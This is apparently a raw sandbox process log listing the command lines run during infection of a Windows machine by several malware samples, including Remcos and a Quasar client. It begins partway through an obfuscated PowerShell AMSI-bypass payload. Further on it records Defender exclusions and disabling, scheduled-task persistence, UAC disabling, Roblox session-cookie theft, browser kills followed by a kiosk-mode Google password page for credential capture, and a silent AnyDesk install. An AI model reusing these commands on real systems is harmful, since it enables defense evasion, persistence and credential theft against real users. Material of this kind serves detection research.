IntPtr).GetType(),[string]),$Null);$GHtBpXAToHgwfgfoTzU=WlncqTHGvucm @([String])([IntPtr]);$PoeYYrnupxOdRIAddSDagH=WlncqTHGvucm @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$kecPIvrIYuu=$mZuNEiLyRtCUp.GetMethod(''+'G'+''+'e'+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+'l'+'e'+''+[Char](72)+''+[Char](97)+''+'n'+''+[Char](100)+''+[Char](108)+'e').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+[Char](110)+''+[Char](101)+''+[Char](108)+'3'+[Char](50)+''+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$HxYnexSUiwjHEM=$caQOLnnOVyUQtA.Invoke($Null,@([Object]$kecPIvrIYuu,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+'d'+''+'L'+''+[Char](105)+''+[Char](98)+''+[Char](114)+''+'a'+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$URmAhnvwEKANDSeyw=$caQOLnnOVyUQtA.Invoke($Null,@([Object]$kecPIvrIYuu,[Object](''+[Char](86)+''+'i'+'r'+[Char](116)+''+'u'+''+[Char](97)+''+[Char](108)+''+[Char](80)+'rot'+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$TyKejPz=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($HxYnexSUiwjHEM,$GHtBpXAToHgwfgfoTzU).Invoke('a'+[Char](109)+''+[Char](115)+'i'+[Char](46)+''+[Char](100)+'l'+'l'+'');$hzMEouUjDYAEWgYrz=$caQOLnnOVyUQtA.Invoke($Null,@([Object]$TyKejPz,[Object](''+[Char](65)+''+'m'+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+''+[Char](97)+''+'n'+''+[Char](66)+''+[Char](117)+''+'f'+''+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$jSOydZrhHK=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($URmAhnvwEKANDSeyw,$PoeYYrnupxOdRIAddSDagH).Invoke($hzMEouUjDYAEWgYrz,[uint32]8,4,[ref]$jSOydZrhHK);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$hzMEouUjDYAEWgYrz,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($URmAhnvwEKANDSeyw,$PoeYYrnupxOdRIAddSDagH).Invoke($hzMEouUjDYAEWgYrz,[uint32]8,0x20,[ref]$jSOydZrhHK);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+'O'+'F'+'TW'+'A'+'R'+'E'+'').GetValue(''+'r'+''+[Char](117)+''+[Char](116)+''+'s'+''+[Char](115)+'t'+[Char](97)+''+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\ruts\rutserv.exe
C:\Windows\SysWOW64\ruts\rutserv.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
C:\Windows\SysWOW64\ruts\rutserv.exe
C:\Windows\SysWOW64\ruts\rutserv.exe -run_agent -second
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{c1aa2d9e-c61f-4595-b9c9-87085f2a3831}
C:\Users\Admin\AppData\Local\Temp\a\SH.exe
"C:\Users\Admin\AppData\Local\Temp\a\SH.exe"
C:\Users\Admin\AppData\Local\Temp\a\Systenn.exe
"C:\Users\Admin\AppData\Local\Temp\a\Systenn.exe"
C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe
"C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Users\Admin\AppData\Local\Temp\a\qwex.exe
"C:\Users\Admin\AppData\Local\Temp\a\qwex.exe"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 460 -p 5204 -ip 5204
C:\Users\Admin\AppData\Local\Temp\a\XW.exe
"C:\Users\Admin\AppData\Local\Temp\a\XW.exe"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5204 -s 1416
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe'
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe
"C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe"
C:\Users\Admin\AppData\Local\Temp\a\boleto.exe
"C:\Users\Admin\AppData\Local\Temp\a\boleto.exe"
C:\Users\Admin\AppData\Local\Temp\a\piotjhjadkaw.exe
"C:\Users\Admin\AppData\Local\Temp\a\piotjhjadkaw.exe"
C:\Users\Admin\AppData\Local\Temp\a\krgawdtyjawd.exe
"C:\Users\Admin\AppData\Local\Temp\a\krgawdtyjawd.exe"
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "xda" /tr "C:\Users\Admin\AppData\Roaming\System32\xda.dll"
C:\Users\Admin\AppData\Local\Temp\a\jdrgsotrti.exe
"C:\Users\Admin\AppData\Local\Temp\a\jdrgsotrti.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\a\kisteruop.exe
"C:\Users\Admin\AppData\Local\Temp\a\kisteruop.exe"
C:\Users\Admin\AppData\Local\Temp\a\vovdawdrg.exe
"C:\Users\Admin\AppData\Local\Temp\a\vovdawdrg.exe"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 548 -p 3200 -ip 3200
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3200 -s 308
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Users\Admin\AppData\Local\Temp\a\mfcthased.exe
"C:\Users\Admin\AppData\Local\Temp\a\mfcthased.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\a\kisloyat.exe
"C:\Users\Admin\AppData\Local\Temp\a\kisloyat.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\XW.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\boleto.exe'
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\a\daytjhasdawd.exe
"C:\Users\Admin\AppData\Local\Temp\a\daytjhasdawd.exe"
C:\Users\Admin\AppData\Local\Temp\a\ScreenUpdateSync.exe
"C:\Users\Admin\AppData\Local\Temp\a\ScreenUpdateSync.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XW.exe'
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'boleto.exe'
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\a\vcredist_x86.exe
"C:\Users\Admin\AppData\Local\Temp\a\vcredist_x86.exe"
C:\Windows\SysWOW64\msiexec.exe
msiexec /i vcredist.msi
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k swprv
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\MicrosoftProfile.exe'
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\boleto.exe'
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4012 -ip 4012
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4012 -s 1224
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F32D97DF-E3E5-4CB9-9E3E-0EB5B4E49801}
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MicrosoftProfile.exe'
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe" && pause
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2080 -s 292
C:\Users\Admin\AppData\Local\Temp\a\jy.exe
"C:\Users\Admin\AppData\Local\Temp\a\jy.exe"
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "boleto" /tr "C:\Users\Admin\AppData\Roaming\boleto.exe"
C:\Users\Admin\AppData\Local\Temp\is-A3TU6.tmp\jy.tmp
"C:\Users\Admin\AppData\Local\Temp\is-A3TU6.tmp\jy.tmp" /SL5="$C0112,1888137,52736,C:\Users\Admin\AppData\Local\Temp\a\jy.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "MicrosoftProfile" /tr "C:\Users\Admin\MicrosoftProfile.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\PING.EXE
ping localhost
C:\Users\Admin\AppData\Local\Temp\a\test30.exe
"C:\Users\Admin\AppData\Local\Temp\a\test30.exe"
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Users\Admin\MicrosoftProfile.exe
C:\Users\Admin\MicrosoftProfile.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 4864 -ip 4864
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4864 -s 852
C:\Users\Admin\AppData\Local\Temp\a\testingfile.exe
"C:\Users\Admin\AppData\Local\Temp\a\testingfile.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "wod2" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "wod2" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 5116 -ip 5116
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 4996 -ip 4996
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4996 -s 444
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5116 -s 1292
C:\Users\Admin\AppData\Local\Temp\a\Discord.exe
"C:\Users\Admin\AppData\Local\Temp\a\Discord.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\powerstealer.exe" /rl HIGHEST /f
C:\Windows\system32\srtasks.exe
C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:3
C:\Users\Admin\AppData\Roaming\SubDir\powerstealer.exe
"C:\Users\Admin\AppData\Roaming\SubDir\powerstealer.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\powerstealer.exe" /rl HIGHEST /f
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.10.1
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding C3B8B64ABBA0A86523A6E16BAE0AF93E
C:\Users\Admin\AppData\Local\Temp\a\RuntimeBroker.exe
"C:\Users\Admin\AppData\Local\Temp\a\RuntimeBroker.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f
C:\Windows\system32\devtun\RuntimeBroker.exe
"C:\Windows\system32\devtun\RuntimeBroker.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GpKccFX4bnCh.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Local\Temp\a\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\a\Loader.exe"
C:\Users\Admin\AppData\Local\Temp\a\SigniantApp_Installer_1.5.1806.exe
"C:\Users\Admin\AppData\Local\Temp\a\SigniantApp_Installer_1.5.1806.exe"
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SigniantInstallhelper.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SigniantInstallhelper.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SigniantApp_Installer.exe
"C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SigniantApp_Installer.exe"
C:\Windows\SYSTEM32\msiexec.exe
msiexec /i SigniantApp_Installer.msi /L*V ..\SigniantAppInstaller.log /qn+ REBOOT=ReallySuppress LAUNCHEDBY=fullExeInstall
C:\Windows\system32\devtun\RuntimeBroker.exe
"C:\Windows\system32\devtun\RuntimeBroker.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ouCRXiP71ylE.bat" "
C:\Users\Admin\AppData\Local\Temp\a\wmfdist.exe
"C:\Users\Admin\AppData\Local\Temp\a\wmfdist.exe"
C:\Users\Admin\AppData\Local\Temp\a\KeePassRDP_v2.2.2.exe
"C:\Users\Admin\AppData\Local\Temp\a\KeePassRDP_v2.2.2.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 6104 -ip 6104
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6104 -s 1292
C:\Users\Admin\AppData\Local\Temp\a\leto.exe
"C:\Users\Admin\AppData\Local\Temp\a\leto.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 6112 -ip 6112
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\y8B03.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\y8B03.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6112 -s 580
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1a51J4.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1a51J4.exe
C:\Users\Admin\AppData\Local\Temp\a\dxwebsetup.exe
"C:\Users\Admin\AppData\Local\Temp\a\dxwebsetup.exe"
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\dxwsetup.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\dxwsetup.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 6112 -ip 6112
C:\Users\Admin\AppData\Local\Temp\a\fcxcx.exe
"C:\Users\Admin\AppData\Local\Temp\a\fcxcx.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6112 -s 588
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3Y06E.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3Y06E.exe
C:\Users\Admin\AppData\Local\Temp\a\Itaxyhi.exe
"C:\Users\Admin\AppData\Local\Temp\a\Itaxyhi.exe"
C:\Users\Admin\AppData\Local\Temp\a\XClient.exe
"C:\Users\Admin\AppData\Local\Temp\a\XClient.exe"
C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
C:\ProgramData\Remcos\remcos.exe
"C:\ProgramData\Remcos\remcos.exe"
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
\??\c:\program files (x86)\internet explorer\iexplore.exe
"c:\program files (x86)\internet explorer\iexplore.exe"
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Users\Admin\AppData\Local\Temp\1014479001\c7611183bd.exe
"C:\Users\Admin\AppData\Local\Temp\1014479001\c7611183bd.exe"
C:\Users\Admin\AppData\Local\Temp\a\laz.exe
"C:\Users\Admin\AppData\Local\Temp\a\laz.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6245.tmp\6246.tmp\6247.bat C:\Users\Admin\AppData\Local\Temp\a\laz.exe"
C:\Users\Admin\AppData\Local\Temp\1014480001\5b3682fec0.exe
"C:\Users\Admin\AppData\Local\Temp\1014480001\5b3682fec0.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM firefox.exe /T
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM chrome.exe /T
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\MicrosoftProfile.exe
C:\Users\Admin\MicrosoftProfile.exe
C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe
"C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe"
C:\Users\Admin\AppData\Local\Temp\1014481001\f903843309.exe
"C:\Users\Admin\AppData\Local\Temp\1014481001\f903843309.exe"
C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe
"C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe" --local-service
C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe
"C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe" --local-control
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM msedge.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM opera.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM brave.exe /T
C:\Users\Admin\AppData\Local\Temp\a\svchosts.exe
"C:\Users\Admin\AppData\Local\Temp\a\svchosts.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5096 -ip 5096
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2016 -parentBuildID 20240401114208 -prefsHandle 1932 -prefMapHandle 1920 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a8ee8605-b83f-47be-9bab-19dfa966a823} 7932 "\\.\pipe\gecko-crash-server-pipe.7932" gpu
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5096 -s 1280
C:\Users\Admin\AppData\Local\Temp\1014482001\c3b2dc643f.exe
"C:\Users\Admin\AppData\Local\Temp\1014482001\c3b2dc643f.exe"
C:\Users\Admin\AppData\Local\Temp\a\any_dsk.exe
"C:\Users\Admin\AppData\Local\Temp\a\any_dsk.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\AB35.tmp\AB36.tmp\AB37.bat C:\Users\Admin\AppData\Local\Temp\a\any_dsk.exe"
C:\Users\Admin\AppData\Roaming\AnyDesk.exe
C:\Users\Admin\AppData\Roaming\anydesk.exe --install "C:\Program Files (x86)\AnyDesk" --start-with-win --silent
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM firefox.exe /T
C:\Users\Admin\AppData\Local\Temp\a\dismhost.exe
"C:\Users\Admin\AppData\Local\Temp\a\dismhost.exe"
C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe"
C:\Program Files (x86)\AnyDesk\AnyDesk.exe
"C:\Program Files (x86)\AnyDesk\AnyDesk.exe" --service
C:\Users\Admin\AppData\Local\Temp\a\5dismhost.exe
"C:\Users\Admin\AppData\Local\Temp\a\5dismhost.exe"
C:\Users\Admin\AppData\Local\Temp\a\4dismhost.exe
"C:\Users\Admin\AppData\Local\Temp\a\4dismhost.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 8248 -ip 8248
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM chrome.exe /T
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8248 -s 80
C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe" /RunAsService
C:\Users\Admin\AppData\Local\Temp\a\6dismhost.exe
"C:\Users\Admin\AppData\Local\Temp\a\6dismhost.exe"
C:\Users\Admin\AppData\Local\Temp\a\2dismhost.exe
"C:\Users\Admin\AppData\Local\Temp\a\2dismhost.exe"
C:\Users\Admin\AppData\Local\Temp\a\3dismhost.exe
"C:\Users\Admin\AppData\Local\Temp\a\3dismhost.exe"
C:\Program Files (x86)\AnyDesk\AnyDesk.exe
"C:\Program Files (x86)\AnyDesk\AnyDesk.exe" --control
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM msedge.exe /T
C:\Users\Admin\AppData\Local\Temp\1014483001\8513e02f5d.exe
"C:\Users\Admin\AppData\Local\Temp\1014483001\8513e02f5d.exe"
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\1014484001\4070a7fd78.exe
"C:\Users\Admin\AppData\Local\Temp\1014484001\4070a7fd78.exe"
C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe" /RunAsService
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 7056 -ip 7056
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7056 -s 776
